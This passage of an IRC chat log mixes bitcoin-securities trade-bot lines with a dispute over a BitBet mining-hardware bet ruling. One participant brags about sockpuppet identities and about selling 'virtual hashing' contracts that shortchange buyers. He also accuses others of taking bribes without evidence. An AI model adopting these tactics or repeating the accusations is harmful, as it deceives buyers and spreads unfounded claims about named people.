clicked instantly. Mercurial is thus named in Larry's Sep 07 16:31:40 honor. I do not know if the same is true of Git." Sep 07 16:31:41 lol Sep 07 16:32:58 [BTCTC] [LABCOIN] 1 @ 0.003406 BTC [+] Sep 07 16:34:29 [MPEX] [S.MPOE] 2324 @ 0.00088357 = 2.0534 BTC [-] Sep 07 16:34:29 [MPEX] [S.MPOE] 4200 @ 0.00088315 = 3.7092 BTC [-] Sep 07 16:34:47 [MPEX] [S.MPOE] 2369 @ 0.00088186 = 2.0891 BTC [-] Sep 07 16:39:09 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [+] Sep 07 16:53:26 [HAVELOCK] [XBOND] 3 @ 0.00104999 = 0.0031 BTC [-] Sep 07 16:54:26 [BTCTC] [BASIC-MINING] 4 @ 0.1231 = 0.4924 BTC [+] Sep 07 16:54:28 [BTCTC] [BASIC-MINING] 23 @ 0.122 = 2.806 BTC [-] Sep 07 16:54:28 [BTCTC] [BASIC-MINING] 10 @ 0.12 = 1.2 BTC [-] Sep 07 16:57:39 [BTCTC] [DMS.MINING] 23 @ 0.00247 = 0.0568 BTC [-] Sep 07 16:57:51 [BTCTC] [PAJKA.BOND] 1 @ 0.01249 BTC [+] Sep 07 16:59:46 [BTCTC] [TAT.ASICMINER] 30 @ 0.0212 = 0.636 BTC [-] Sep 07 17:03:26 [BTCTC] [DMS.MINING] 1 @ 0.00247 BTC [-] Sep 07 17:04:26 [BTCTC] [DMS.MINING] 2 @ 0.00247 = 0.0049 BTC [-] Sep 07 19:07:41 yep Sep 07 19:07:45 looks like the thread is going well Sep 07 19:07:46 https://bitcointalk.org/index.php?topic=289316.msg3101801#msg3101801 Sep 07 19:07:53 BitBet incorrectly declares yes to a no bet. Stay Away from BitBet! Sep 07 19:07:55 latest person to agree that the UNIT did not perform as advertsied Sep 07 19:09:03 Luke-Jr will soon look like quite the idiot Sep 07 19:09:16 trying to argue that multiple stand-alone units equal 1 unit Sep 07 19:09:22 2 UNITS != 1 UNIT Sep 07 19:09:30 unbelieveable Sep 07 19:09:54 soon? that time has passed. Sep 07 19:10:16 anyway the forum tards can yap all the can, doesnt change a thing. Sep 07 19:10:30 it does change a thing Sep 07 19:10:31 all they can Sep 07 19:10:39 what Sep 07 19:10:41 thats what you think :) Sep 07 19:10:43 the more people agreeing that bitbet is a scam and that the bet was a NO, the better Sep 07 19:10:44 's Luke-Jr to do with it ? Sep 07 19:10:56 Luke-Jr tried to argue that 2 units == 1 unit Sep 07 19:11:04 fractal bitcoin is not about headcount. the sooner you come to terms with it the better (for you). Sep 07 19:11:06 he's basically mathmatically retarted Sep 07 19:11:12 uh. Sep 07 19:11:26 jesus what a troublemaker. what the fuck am i going to say now ;/ Sep 07 19:11:42 lol Sep 07 19:12:06 headcount must matter at some point.... popular opinion DOES matter Sep 07 19:12:25 nope. Sep 07 19:12:26 it will be a long and difficult process, but eventually, people will agree that the this bet was a total fraud Sep 07 19:12:33 it used to, back in the fiat days. those days are gone. Sep 07 19:12:46 offtopic, a fella i know is waiting 3 months now for 30k eur from gox and they dont wanna pay. Sep 07 19:12:54 its turning back to ugly. Sep 07 19:12:55 except that if people don't trust bitbet , they won't use it, == lost revenues Sep 07 19:12:55 they can agree with anything they want. popular vote is no longer relevant in this world. Sep 07 19:13:09 fractal you equivocate "people". Sep 07 19:14:20 its ok. a bitbet clone that is more trusted will pop up soon, with 0% fees Sep 07 19:14:24 [ANNOUNCEMENT] NEO & BEE The Bitcoin Bank & Payment System (Cyprus) https://bitcointalk.org/index.php?topic=289730.0 Sep 07 19:14:24 This is the first XBOND exchangeable offering, the first offering to work under the new terminology of IPVO, and TAT Investments largest undertaking to date Sep 07 19:14:24 Full prospectus can be viewed here: http://lmb-holdings.com/LMB_Holdings_Prospectus.pdf Sep 07 19:14:39 fractal ya, how's that coming along ? Sep 07 19:14:57 ;;getrating fractal Sep 07 19:14:57 Use the gettrust command instead. See http://wiki.bitcoin-otc.com/wiki/OTC_Rating_System#Relying_on_the_rating Sep 07 19:15:04 ;;gettrust fractal Sep 07 19:15:04 slowly Sep 07 19:15:04 WARNING: Currently not authenticated. Trust relationship from user kakobrekla to user fractal: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://b-otc.com/stg?source=kakobrekla&dest=fractal | WoT data: http://b-otc.com/vrd?nick=fractal Sep 07 19:15:14 kakobrekla well he's new. Sep 07 19:15:30 It will also be the first coordinate offering across exchanges simultaneously Sep 07 19:15:36 coordinated* Sep 07 19:15:42 don't bother getrating me. i use multiple nicks, and have multiple identities. and multiple accounts on bitcointalk...... infact, i'm a popular user in here with another nickname ;) pretty fun actually .... Sep 07 19:15:57 thats good to know. Sep 07 19:15:59 fractal don't be stupid. pick an identity and stick to it. Sep 07 19:16:38 ThickAsThieves, interesting. Checking now. Sep 07 19:16:40 why would i do that? multiple identies means i can have multiple reputations, some i dont care about ruining, some that are very good . Sep 07 19:16:54 its the best of both worlds. Sep 07 19:17:11 i guess everyone needs to learn by doing. Sep 07 19:17:13 fine, go right ahead. Sep 07 19:17:14 well, you just ruined the fractal identitiy Sep 07 19:17:48 not really, fractal has a bunch of support right now regarding this bet , -- he is a pretty divisive figure though Sep 07 19:17:56 ;> Sep 07 19:18:13 the argument as support regardless of identity Sep 07 19:18:16 has* Sep 07 19:18:59 any stupidity can gather some support, that's the nature of the internet. Sep 07 19:19:11 out of however many people you can find some willing to swallow anything. Sep 07 19:19:23 for example, if i used my main identity for this bet, it would mean getting into a bunch of arguments with people i talk to regularly... luke-jr, for example, has posted something completely idiotic in the thread, and now has egg on his face Sep 07 19:19:28 he should have used a diff identity Sep 07 19:20:02 i propose you completely misunderstand what identity is, what it works and what it's for. Sep 07 19:20:10 if punin replies that one unit is whatever is attached to 1-Mboard, it will put the matter to rest and fractal will be vindicated, and bitbet will look like idiots Sep 07 19:20:18 even the expression "different identity" is retarded on its face. Sep 07 19:20:41 but that aside : strawmen never won a dispute. Sep 07 19:21:00 no way. look at matthew N wright. he could have trolled everyone with his stupid bet if he used a diff identity, instead he decided to troll with his real one -- pretty stupid Sep 07 19:21:01 they're right about the bet though MP it's a clear no Sep 07 19:21:26 Agreed. Sep 07 19:21:33 Duffer1 well apparently they weren't. Sep 07 19:21:55 ThickAsThieves: if I get Neobee shares by using XBONDs, it can be on Havelock still? No bitfunder? Sep 07 19:22:45 bitbet was wrong Sep 07 19:23:50 and people who are objective and logical will see that all clauses of the bet weren't met, and for that reason it must have been a NO. the decision will haunt bitbet for years to come, as it will not go away Sep 07 19:23:55 yes yes, i get you, "the people" know, which is to say the various "different identities" of whatever random trolls, and you'll make a better communist version of bitbet with 0% fees and direct access to the definitive truths. Sep 07 19:24:01 how's something awful these days ? Sep 07 19:24:13 aw yissss Sep 07 19:24:28 mircea_popescu is hear to call fractal an idiot Sep 07 19:24:32 0% fees doesn't mean that it won't be profitable Sep 07 19:24:33 here* Sep 07 19:24:39 you can make money with 0% fees Sep 07 19:24:52 advertising? who wants to see that.. Sep 07 19:24:56 and not communist Sep 07 19:24:59 not advertising either Sep 07 19:25:23 fractal at issue is the romantic notion that you'll somehow know the truth, not the fees. Sep 07 19:25:58 the truth is that the bet was a NO, and bitbet said it was a yes, because they were paid off by Anduck, . fraud. Sep 07 19:26:05 hahaha what. Sep 07 19:26:11 thats the rumour going around. Sep 07 19:26:21 since when does anduck have money to pay anyone off. Sep 07 19:26:22 hahahahahahaha Sep 07 19:26:29 ThickAsThieves: if I get Neobee shares by using XBONDs, it can be on Havelock still? No bitfunder? <<<< Th XBOND redemption is only towards BitFunder shares, this limitation came about in the negotiation process. You may, however, export the shares anywhere you like once you have them though, as transfer services are being offewred Sep 07 19:26:29 oh god Sep 07 19:26:39 he had 10BTC at stake and paid a 5BTC bribe to get it as a yes bet Sep 07 19:27:02 that'd be predictably ridiculous. Sep 07 19:27:07 obviously BitBet accepted this bribe, because theres no logical reason why it should have been a yes Sep 07 19:27:25 you're taking an excursion into cognitive dissonance. Sep 07 19:27:32 makes perfect sense to me, as well as others. Sep 07 19:27:47 how can BitBet be trusted when they're making incorrect bet outcomes and taking bribes? Sep 07 19:27:56 as well as others identically identified with you or as well as others differently identified with you ? Sep 07 19:28:11 there is a logical reason for yes, i disagree with it, but it's there Sep 07 19:28:25 who knows who we'll be able to identify which identities are identifyable??? Sep 07 19:28:27 well, bitbet isn't doing either. i can see why some people would very much like to claim this, especially after the painful experience of labcoin in their thread Sep 07 19:28:29 but otherwise... Sep 07 19:29:24 maybe BitBet shouldn't accept bad bets anymore? Sep 07 19:29:36 that shouldn't be their responsibility Sep 07 19:29:38 well ideally it shouldn't, but there's this bitch with recognising them in practice. Sep 07 19:29:48 so far all the deliveries either delivered or missed by a mile Sep 07 19:29:55 having something come in under 10% is rare. Sep 07 19:30:00 forcing BitFunder is annoying… but as long as I have zero bitcoins in there I should be fine I guess Sep 07 19:30:10 that labcoin bet is gonna cause a bit of drama hehe Sep 07 19:30:20 Duffer1 from what i saw already has. Sep 07 19:30:36 but 10% under is still a miss... which is still a no. Sep 07 19:31:05 arguably. apparently that argument didn't prevail. Sep 07 19:31:10 what labcoin bet? Sep 07 19:31:14 url? Sep 07 19:31:38 http://bitbet.us/bet/521/labcoins-own-130nm-design-sample-chips-will-be/ Sep 07 19:31:39 mp: well thats because whoever decided is a fool, and bitbet will take a reputational hit for it Sep 07 19:31:44 BitBet - Labcoins own 130nm design sample chips will be received by testers by 12TH SEPT 2013 Sep 07 19:31:46 the one about 5 tested samples before a certain date Sep 07 19:32:01 [BTCTC] [DMS.PURCHASE] 1 @ 0.01209 BTC [-] Sep 07 19:32:51 fractal he who steps into deciding contentious matters without recourse for the parties is going to make a lot of enemies of your sort. Sep 07 19:32:52 "PR outlets and known shills specifically excluded" --- this is bad bet language... what is a PR outlet? who are the known shills? this is the kind of bullshit bet that BitBet should NOT be accepting Sep 07 19:33:03 this was well known aforehand, excuse me if i fail to be impressed a year later. Sep 07 19:33:27 yeah ? how would you have phrased that ? Sep 07 19:33:48 [BTCTC] [NASTY-PT] 4 @ 0.002099 = 0.0084 BTC [+] Sep 07 19:34:18 "anyone officially involved with, or paid by" Sep 07 19:34:29 id' specifically list names of users who have ordered and agreed to verity Sep 07 19:34:31 meh idc Sep 07 19:34:32 Error: Google 2-Factor MUST be enabled to transfer shares. Sep 07 19:34:38 lol bitfunder Sep 07 19:34:42 really the worst site ever Sep 07 19:34:56 bf makes me sad :( Sep 07 19:35:00 fractal what if the list is 50`000 names long ? Sep 07 19:35:04 heres another bullshit sentence -- "credibly show their sample ASIC chip working to specification" what is the specification? what is the timestamp of the spec? what if Labcoin changes spec during the bet? Sep 07 19:35:16 mp: not hard to link to a pastebin Sep 07 19:35:16 the timestamp is the date the bet was made. Sep 07 19:35:27 this was established already on the bfl contentions. Sep 07 19:35:35 and yes it's not hard to link to a pastebin but it's hard to have it read. Sep 07 19:35:39 [BTCTC] [DMS.PURCHASE] 1 @ 0.01209 BTC [-] Sep 07 19:35:47 mp: so then why was the bitfury bet a yes when the hardware UNIT as advertised didn't do 400Gh? but only 365Gh???????????? Sep 07 19:35:51 i'd rather have vague short text everyone can be expected to read than long text everyone can be expected not to read. Sep 07 19:36:21 mp: the bitfury bet, as timestamped, showed the 400Gh unit as being hardware on 1M-board. Sep 07 19:36:24 making a database of every name involved is a completely unrealistic expectation for any bet Sep 07 19:36:30 Duffer1 exactly. Sep 07 19:36:48 fractal they advertised two types, overshot performance on one, undershot on the other and made up for the difference sending more gear. Sep 07 19:36:53 mp: if bitfury sehipped more hardware, they changed the spec, and the bet was a yes..... you've contradicted yourself. Sep 07 19:37:00 i get that in a strong nominalist view you want this as a no, Sep 07 19:37:15 but you'll have to understand that bitbet is used by many people for many purposes and technical arguments may or may not carry. Sep 07 19:37:17 a nominalist view is the only way to decide it. Sep 07 19:37:30 ideally your position is substantially supported. if it's technically suported you're at risk. Sep 07 19:37:39 people bet based on the logical flow of the language in the bet Sep 07 19:37:48 this is true now and it'll stay true as best as i can determine until we move on to writing c++ instead of english Sep 07 19:37:57 hahah Sep 07 19:38:01 lol Sep 07 19:38:20 [HAVELOCK] [DEALCO] 1 @ 0.01185 BTC [-] Sep 07 19:38:39 [HAVELOCK] [XBOND] 5 @ 0.00106 = 0.0053 BTC [+] Sep 07 19:38:40 mp: i think betbet should return the NO bets their money, and then gain from the positive PR they'd receive Sep 07 19:39:01 well if that's what you think i really can't wait for your competitor. Sep 07 19:39:11 rather then having these forum posts continue on indefinitely Sep 07 19:39:16 i'd bet there a lot, seeing how i probably have a lot more shitslinging capacity than you can dream of. Sep 07 19:39:27 hahaha Sep 07 19:39:30 ok sounds good Sep 07 19:40:25 fuckbitbet.com wouldn't take bad bets though in the first place, so it woudln't run into these problems Sep 07 19:40:35 chip & pin card design added to details: http://i.imgur.com/YebNUYx.png Sep 07 19:40:53 well no, as a fiction it wouldn't. once it's live i'm curious how that works. Sep 07 19:41:03 and im not being facetious either. i'm actually curious. maybe i learn something. Sep 07 19:41:30 just dont take bad bets. if the bet can't be broken down into logical symbols, dont take it Sep 07 19:41:45 with all terms defined Sep 07 19:42:24 this sounds great in theory. Sep 07 19:42:37 btw, please dont register fuckbitbet.com Sep 07 19:42:38 ThickAsThieves looks hot man, i like it a lot (except the yellow color of nEo, bitcoin orange might be cool) Sep 07 19:43:01 [BTCTC] [ASICMINER-PT] 1 @ 2.217 BTC [-] Sep 07 19:43:03 im not gonna. Sep 07 19:43:25 (and if i was gonna i'd have registered it in january not september.) Sep 07 19:43:40 why not? im trying to use reverse psychology so that you have to spend $4 Sep 07 19:43:44 regsiter it!! Sep 07 19:43:58 [BTCTC] [ACTIVEMINING] 62 @ 0.003801 = 0.2357 BTC [-] Sep 07 19:43:59 [BTCTC] [ACTIVEMINING] 188 @ 0.0038 = 0.7144 BTC [-] Sep 07 19:43:59 lmao why not. because i believe in free speech. Sep 07 19:44:07 now i'm actually using reverse reverse psychology so that you don't register it Sep 07 19:44:23 or potentially reverse-reverse-reverse psychology Sep 07 19:44:34 just go get laid. Sep 07 19:44:54 advice we can all take, i'm sure. Sep 07 19:45:23 im dried out. celebrated 100mn yesterday. Sep 07 19:45:34 whats 100mn Sep 07 19:47:05 http://log.bitcoin-assets.com/?date=06-09-2013#290235 Sep 07 19:47:44 lol, just go get laid Sep 07 19:48:05 #bitcoin-assets log Sep 07 19:48:45 oh, 100m difficulty? Sep 07 19:48:50 yeah thats not surprising Sep 07 19:49:16 it takes more to make a block than all the math done in the entire history of humanity up until 1900 or so. Sep 07 19:49:23 btw, i gave up on trying to convince idiots that buying mining equipment in USD that doesn't ROI in BTC terms is a bad idea.... Sep 07 19:50:03 so now i'm selling virtual hashing units for USD that will never ROI in BTC terms.... i'm paying out 100% PPS, and pocketing the BTC differential as profit Sep 07 19:50:27 but the idiot buyers are happy because 'when the exchange rate goes up, they'll ROI in USD!' Sep 07 19:50:37 [BTCTC] [ACTIVEMINING] 62 @ 0.0038 = 0.2356 BTC [-] Sep 07 19:50:38 sooooooo stupid Sep 07 19:50:39 [BTCTC] [ACTIVEMINING] 238 @ 0.003785 = 0.9008 BTC [-] Sep 07 19:50:42 easy money Sep 07 19:50:58 [BTCTC] [LABCOIN] 250 @ 0.00343 = 0.8575 BTC [+] Sep 07 19:51:18 [BTCTC] [BASIC-MINING] 2 @ 0.1049 = 0.2098 BTC [+] Sep 07 19:51:19 [BTCTC] [BASIC-MINING] 1 @ 0.1049 BTC [+] Sep 07 19:51:38 they send me USD. i immeditaely convert it to BTC.... then i pay them out 50% of that over the lifetime of the virtual miner, and keep the other 50% as profit Sep 07 19:51:51 soooooooooo stupid idiots all over the forums falling for this Sep 07 19:51:59 already have 800 BTC in contracts Sep 07 19:52:12 ThickAsThieves looks hot man, i like it a lot (except the yellow color of nEo, bitcoin orange might be cool) <<< I like the yellow, but ultimately that's all decided by the marketing team Sep 07 19:52:22 [BTCTC] [BASIC-MINING] 1 @ 0.1049 BTC [+] Sep 07 19:52:24 [BTCTC] [BASIC-MINING] 1 @ 0.105 BTC [+] Sep 07 19:52:31 I did suggest some tweaks, who knows if they'll listen :) Sep 07 19:52:59 cheers man, i'm reading the prospectus now Sep 07 19:53:10 all Mining company IPOs are a scam Sep 07 19:53:15 AM, VMC, all of them Sep 07 19:53:15 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Sep 07 19:53:20 short all of them to zero Sep 07 19:53:44 [HAVELOCK] [LABCO] 20 @ 0.0031 = 0.062 BTC [-] Sep 07 19:54:00 [HAVELOCK] [LABCO] 2 @ 0.0031 = 0.0062 BTC [-] Sep 07 19:54:12 all companies are a scam, cuz like 99% of them go out of business someday Sep 07 19:54:30 right. which means you have to sell shares to idiots to make money, which is morally wrong Sep 07 19:54:38 according to luke-jr Sep 07 19:54:46 i don't see how it's a scam if divs provide more income than your buy in Sep 07 19:55:01 fractal: I don't decide morals. Sep 07 19:55:29 Luke-Jr: you try to preach arbitrary ones Sep 07 19:55:31 nor did I say what fractal claims I said Sep 07 19:55:45 universal morals dont exist, everybody has different definitions. so get off your high horse Sep 07 19:56:15 fractal: universal morals DO exist Sep 07 19:56:19 why even bother with this guy Sep 07 19:56:21 Luke-Jr: yeah, you instead accuse others of trying to 'steal' coins from people. incredibly rude and unprofessional Sep 07 19:56:23 "everybody" making up their own is merely delusional Sep 07 19:56:30 he reminds me of the crazy homeless guys who talk to themselves Sep 07 19:56:32 [BTCTC] [ACTIVEMINING] 50 @ 0.003784 = 0.1892 BTC [-] Sep 07 19:56:50 in 10 years he will be on the streets ranting about bitbet Sep 07 19:56:54 Luke-Jr: your morals for betting standards -- i bet most would disagree with you Sep 07 19:57:34 fractal: they aren't mine, and anyone who disagrees with the Church on morals is simply wrong Sep 07 19:57:58 Luke-Jr: the same church that burned books, raped and killed millions? no thank you. Sep 07 19:58:11 fractal: slander all you like, won't make it true Sep 07 19:58:26 Luke-Jr: promote a set of morals that are false all you like, won't make it true Sep 07 19:58:42 I don't. Sep 07 19:58:49 yes, you do Sep 07 19:59:02 you accussed me of theft based on your 'morals' Sep 07 19:59:07 complete bullshit. Sep 07 19:59:19 even after i used your own post to disprove your argument Sep 07 19:59:32 since i told all in the comments that the bet was a NO Sep 07 19:59:35 before betting Sep 07 19:59:41 da fuck is going on here anyway. Sep 07 19:59:42 i checked to make sure the rules Sep 07 20:00:57 Luke-Jr: and by the way, bets on bitbet aren't bets. they are a contract, based on clauses in the FAQ, which read "Bets will not be cancelled because it became impossible for one side to win" ... this is against your morals post, which means everyone who bets on bitbet is not a moral better. which means they aren't betting, they're engaging in a contract Sep 07 20:01:48 mp: basically Luke-Jr tried to accuse me of theft and stealing coins, based on some post from a christian church website on betting, because he thinkgs i knew the outcome before i made the bet, and didn't tell anyone about it in time for them to retract their bet Sep 07 20:01:58 mircea_popescu: fractal claims you're a scammer; while I don't argue about that, I think you made the right call here Sep 07 20:02:19 Luke-Jr: everyone who can do math on the forum post disagrees with you Sep 07 20:02:26 Luke-Jr: 2 units != 1 unit Sep 07 20:02:37 mircea_popescu: http://bitcointroll.org/?topic=289316.0 Sep 07 20:02:42 Luke-Jr: punin himself acknowleged that a 400Gh unit does not do 365Gh Sep 07 20:02:53 [BTCTC] [ASICMINER-PT] 1 @ 2.189 BTC [-] Sep 07 20:03:14 does not do 400Gh Sep 07 20:03:15 [BTCTC] [ASICMINER-PT] 1 @ 2.232 BTC [+] Sep 07 20:03:18 [BTCTC] [BTC-GROWTH] 40 @ 0.0999 = 3.996 BTC [+] Sep 07 20:04:06 also, I'll be monitoring the bitfury thread and waiting for punin to make more comments about what a 'unit' is.... I will post all of these so that people can see that your attempt to define a unit as something other then 1M-board makes you look like a complete fool Sep 07 20:04:25 Luke-Jr: i have no doubt Anduck likely paid you off to shilll for him.... Sep 07 20:04:32 and where's the bitnet? Sep 07 20:04:40 uh, bitbet Sep 07 20:04:57 theres no possible way that anyone could say that a unit was anything other then what fits on 1M-board.... its advertised right on their website Sep 07 20:05:10 the only reason someone would disagree is if they were paid a bribe... Sep 07 20:05:18 you can't defy logic without paying a bribe Sep 07 20:05:27 [BTCTC] [TAT.ASICMINER] 20 @ 0.02049 = 0.4098 BTC [-] Sep 07 20:05:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.02049 = 0.2049 BTC [-] Sep 07 20:05:36 nm, found it Sep 07 20:05:42 Luke-Jr: by the way, why did eligius start merge-mining Namecoin??? i thought you found that chain morally wrong to promote? Sep 07 20:05:48 [BTCTC] [TAT.ASICMINER] 20 @ 0.02048 = 0.4096 BTC [-] Sep 07 20:06:09 Luke-Jr: personally i think its disgusting that you are knowingly merge mining a chain with illegal content on it.... Sep 07 20:06:29 well, after a cursory, glance, it would seem that the outcome of that bet is an obvious no. 365 < 400. Sep 07 20:06:35 who is this guy anyway. Sep 07 20:06:35 Luke-Jr: its clear that money and wealth has corrupted you...... Sep 07 20:06:52 nubbins`: thanks. you and most others are logical. Sep 07 20:07:12 Luke-Jr: why does eligius merge mine namecoins? have you been corrupted by money? Sep 07 20:07:16 mircea_popescu: fractal = integrity42 Sep 07 20:07:36 Luke-Jr: another conspiratorial speculation by yourself Sep 07 20:07:44 with zero evidence to back it up Sep 07 20:08:02 for that matter, if the unit only hashes at 365GH/s, then the "400 gigahash mining units" haven't even been delivered Sep 07 20:08:18 fractal: you spoke as if you were integrity42 and made no attempt to even implicitly deny it until now Sep 07 20:08:19 aka some chick named janet ? Sep 07 20:08:20 nubbins`: exactly.... thank god you can understand logic. Luke-Jr can't Sep 07 20:08:37 "Devices must meet advertised performance" is pretty cut and dry, too. We all know what "MUST" means. Sep 07 20:08:39 nubbins`: they delivered 400 Gh/s units that comprised of multiple boards Sep 07 20:08:43 Luke-Jr: thinks that 2 Units == 1 Unit Sep 07 20:08:54 nubbins`: which operate well within the advertised performance Sep 07 20:08:58 Luke-Jr: 2 Units != 1 Unit. Sep 07 20:09:04 Luke-Jr: they were seperate units Sep 07 20:09:11 it was a refund Sep 07 20:09:21 compensation for missing performance targets Sep 07 20:09:29 Luke-Jr: link to specs? 400GH/s+ at <= 400W? Sep 07 20:09:36 Luke-Jr: Do you know how many H-cards fit in a single unit? Sep 07 20:09:55 Luke-Jr: How many H-cards fit in a single unit? Sep 07 20:10:07 nubbins`: the specs are linked from the OP there Sep 07 20:10:20 nubbins`: the actual watts used by both boards combined is like 270 W Sep 07 20:10:24 Luke-Jr: why does eligius merge mine namecoins? you know it is illegal and immoral. when did you become corrupted by monetary gain? Sep 07 20:10:50 nubbins`: notice how Luke-Jr says 'both' boards... when the bet states it must be contained in a single UNIT Sep 07 20:11:18 Oh. We're debating this AGAIN. This is week three, no? Sep 07 20:11:23 Luke-Jr: why won't you answer my question regarding merge mining namecoin. you know it is immoral. when did you become corrupted by monetary gain? Sep 07 20:11:26 <3 Bitbet. Sep 07 20:11:27 Luke-Jr: so they essentially attached 2 boards together, but it's still 400GH/s+ and <= 400W? And everyone who ordered one of these "400 gigahash mining units" is receiving one of these 2-boards-taped-together devices? Sep 07 20:11:28 fractal: if you have an actual argument why namecoin is illegal or immoral, please feel free to email me with it or bring it up in #eligius - but after the last day or so, you seem entirely un-credible in your claims Sep 07 20:11:50 [BTCTC] [ACTIVEMINING] 20 @ 0.003957 = 0.0791 BTC [+] Sep 07 20:11:52 [BTCTC] [ACTIVEMINING] 10 @ 0.003958 = 0.0396 BTC [+] Sep 07 20:11:55 nubbins`: they're not taped together... they're completely seperate devieces.... completely seperate units, because a single unit does not do 400Gh Sep 07 20:11:58 not everyone received that though Nubbs, it's weird, just ignore it hehe Sep 07 20:12:03 nubbins`: correct, although I don't know if they're physically connected Sep 07 20:12:33 Luke-Jr: it came out of your mouth 2 months ago. you woudn't merge-,mine namecoin because it had illegal data in the blockchain --- i want to know when you changed your mind and became corrupted by money Sep 07 20:12:48 Luke-Jr: they are 100% not physically connected. seperate units. Sep 07 20:13:01 Luke-Jr: but of course, you didnt do your research before spitting out falsehoods Sep 07 20:13:18 fractal: I encourged wizkid057 to reinstate namecoin merged mining when a new development team stepped forward and took it forward with Namecoin-Qt Sep 07 20:13:40 [BTCTC] [ACTIVEMINING] 4 @ 0.003961 = 0.0158 BTC [+] Sep 07 20:13:45 nubbins' did you ever play anarchy online under that name? Sep 07 20:13:47 Luke-Jr: all i see from you is hypocrisy after hypocrisy.... Sep 07 20:13:57 [BTCTC] [BTC-TRADING-PT] 3 @ 1.134 = 3.402 BTC [+] Sep 07 20:14:01 fractal: all I see from you is trolling after trolling Sep 07 20:14:13 [HAVELOCK] [XBOND] 1030 @ 0.001065 = 1.097 BTC [+] Sep 07 20:14:17 [HAVELOCK] [XBOND] 20 @ 0.00107 = 0.0214 BTC [+] Sep 07 20:14:17 okay, well, i see ~500GH/s and ~267W. As long as EVERYONE who ordered the "400 gigahash mining unit" receives a 400 and a 25, the bet is an obvious YES. If not everyone receives a 400 and a 25, the bet is an obvious NO. Sep 07 20:14:20 [HAVELOCK] [XBOND] 20 @ 0.00108 = 0.0216 BTC [+] Sep 07 20:14:23 [HAVELOCK] [XBOND] 15 @ 0.00108999 = 0.0163 BTC [+] Sep 07 20:14:27 [HAVELOCK] [XBOND] 20 @ 0.00109 = 0.0218 BTC [+] Sep 07 20:14:31 [HAVELOCK] [XBOND] 158 @ 0.001093 = 0.1727 BTC [+] Sep 07 20:14:34 [HAVELOCK] [XBOND] 2997 @ 0.001098 = 3.2907 BTC [+] Sep 07 20:14:38 [HAVELOCK] [XBOND] 35 @ 0.00109948 = 0.0385 BTC [+] Sep 07 20:14:41 [HAVELOCK] [XBOND] 294 @ 0.00109997 = 0.3234 BTC [+] Sep 07 20:14:43 oh penis Sep 07 20:14:43 If not everyone receives a 400 plus a 25, then you can't call the 400+25 a "unit" Sep 07 20:14:44 nubbins`: correct, although I don't know if they're physically connected ----- don't you think it would be important to find this out before drawing a conclution? Sep 07 20:14:45 [HAVELOCK] [XBOND] 3 @ 0.00109999 = 0.0033 BTC [+] Sep 07 20:14:49 [HAVELOCK] [XBOND] 10 @ 0.0011 = 0.011 BTC [+] Sep 07 20:14:50 tat save me sooooome Sep 07 20:14:51 [HAVELOCK] [XBOND] 200 @ 0.0011 = 0.22 BTC [+] Sep 07 20:14:54 nubbins`: but they didn't get a 400Gh unit. Sep 07 20:14:55 [HAVELOCK] [XBOND] 140 @ 0.0011 = 0.154 BTC [+] Sep 07 20:14:58 fractal: no, because it is irrelevant Sep 07 20:14:58 [BTCTC] [ACTIVEMINING] 363 @ 0.003982 = 1.4455 BTC [+] Sep 07 20:15:03 nubbins`: no 400Gh unit exists. Sep 07 20:15:17 put it in a larger case, it's a "unit". you're being pedantic Sep 07 20:15:22 nubbins`: some actually got a single board that does 400 Gh/s Sep 07 20:15:28 [BTCTC] [ACTIVEMINING] 38 @ 0.003982 = 0.1513 BTC [+] Sep 07 20:15:39 nubbins`: it still missed performance specs, which is what the bet specifically states... Sep 07 20:15:49 nubbins`: 400Gh in a single unit Sep 07 20:15:54 you can't tape 2 together Sep 07 20:15:56 Luke-Jr: did 5 "Respected members" get them, like the bet says? Sep 07 20:15:58 or put 2 in a box Sep 07 20:16:00 [BTCTC] [LABCOIN] 100 @ 0.0034 = 0.34 BTC [-] Sep 07 20:16:03 [BTCTC] [ACTIVEMINING] 38 @ 0.003981 = 0.1513 BTC [-] Sep 07 20:16:05 [BTCTC] [ACTIVEMINING] 47 @ 0.003982 = 0.1872 BTC [+] Sep 07 20:16:14 nubbins`: no single user who ordered 400Gh unit posted receiving more hardware Sep 07 20:16:27 nubbins`: only 1 guy who ordered 2 units and got an extra h-card Sep 07 20:16:32 nubbins`: I presume, considering bitbet ruled it "yes" Sep 07 20:16:42 but noone who ordered a 400Gh unit only got more then 400Gh Sep 07 20:17:07 [BTCTC] [DMS.SELLING] 10 @ 0.009601 = 0.096 BTC [-] Sep 07 20:17:54 [HAVELOCK] [XBOND] 10 @ 0.00111 = 0.0111 BTC [+] Sep 07 20:17:58 either way, Luke-Jr's hypocrisy and corruption by money for mining namecoin.... should be taken into account when he tries to define what a UNIT is Sep 07 20:18:15 I'm not trying to define a unit. Sep 07 20:18:15 oh, so the guy who got 500GH/s and 267W actually ordered and received a 400GH unit and a 25GH unit, and then just pretended they were collectively a 400GH/s unit? Sep 07 20:18:18 >< Sep 07 20:18:20 [BTCTC] [DMS.SELLING] 8 @ 0.0096 = 0.0768 BTC [-] Sep 07 20:18:25 mircea_popescu already did that Sep 07 20:18:35 and he was the judge, so it's his perrogative to do so Sep 07 20:19:03 i'm mildly surprised you guys can't come to an agreement on this between yourselves Sep 07 20:19:06 [BTCTC] [ACTIVEMINING] 1 @ 0.003987 BTC [+] Sep 07 20:19:07 im not the judge. the closest approximation would be i am the minister of justice. Sep 07 20:19:14 i might intervene in cases where judges are drunk Sep 07 20:19:25 [BTCTC] [DMS.PURCHASE] 4 @ 0.01209 = 0.0484 BTC [-] Sep 07 20:19:28 i won't intervene in cases where one party is pissed off with the judge's ruling. Sep 07 20:19:45 mircea_popescu: well, someone made the call that the bet's outcome was "yes"; that's a judgement. Sep 07 20:19:50 heheh Sep 07 20:20:03 they "substantially delivered" on the word "must"? Sep 07 20:20:14 lel Sep 07 20:20:26 nubbins`: yeah,... substantiall delivered != delivered Sep 07 20:20:37 its mind blowing. Sep 07 20:20:59 to be fair, i only started learning english as an infant, but i'm pretty sure the word "must" is an absolute Sep 07 20:21:14 nubbins`: why, sir, I would say you are correct. Sep 07 20:21:29 i would say you press enter too frequently Sep 07 20:21:31 nubbins` what of the sentence "you must bring a cup of coffee" Sep 07 20:21:36 pankkake gets so mad at this thread. love to see his posts... also proves he doesn't have me on ignore.... lol. Sep 07 20:22:10 mircea_popescu: suppose i bring you a bowl of 